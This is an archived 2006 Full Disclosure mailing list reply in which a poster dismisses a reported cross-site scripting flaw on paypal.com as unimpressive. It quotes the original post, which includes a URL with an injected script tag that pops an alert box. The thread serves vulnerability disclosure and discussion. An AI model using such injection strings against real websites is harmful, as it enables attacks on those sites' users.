Full Disclosure mailing list archives
Re: news XSS on paypal.com
From: "ad () heapoverflow com" <ad () heapoverflow com>
Date: Sun, 23 Jul 2006 13:23:12 +0200
I wonder what is interesting in this , usually a poc show us we can upload a crafted webpage on a vulnerable website, fake a whole webpage, etc, this link doesnt speak much than the noob who found it.
Pigrelax wrote:
Hi! >From Russia Security Site: http://www.securitylab.ru/news/270837.php New worked XSS on paypal.com: www.paypal.com/cgi-bin/webscr?cmd=p/gen/--></script><script>alert('www.securitylab.ru')</script> really work :) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ __________ NOD32 1.1674 (20060722) Information __________ This message was checked by NOD32 antivirus system. part000.txt - is OK http://www.eset.com
Attachment:
ad.vcf
Description:
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- news XSS on paypal.com Pigrelax (Jul 23)
- Re: news XSS on paypal.com ad () heapoverflow com (Jul 23)
- RE: news XSS on paypal.com php0t (Jul 23)
- Re: news XSS on paypal.com ad () heapoverflow com (Jul 23)
- Re: news XSS on paypal.com Javor Ninov (Jul 24)
- RE: news XSS on paypal.com php0t (Jul 23)
- Re: news XSS on paypal.com ad () heapoverflow com (Jul 23)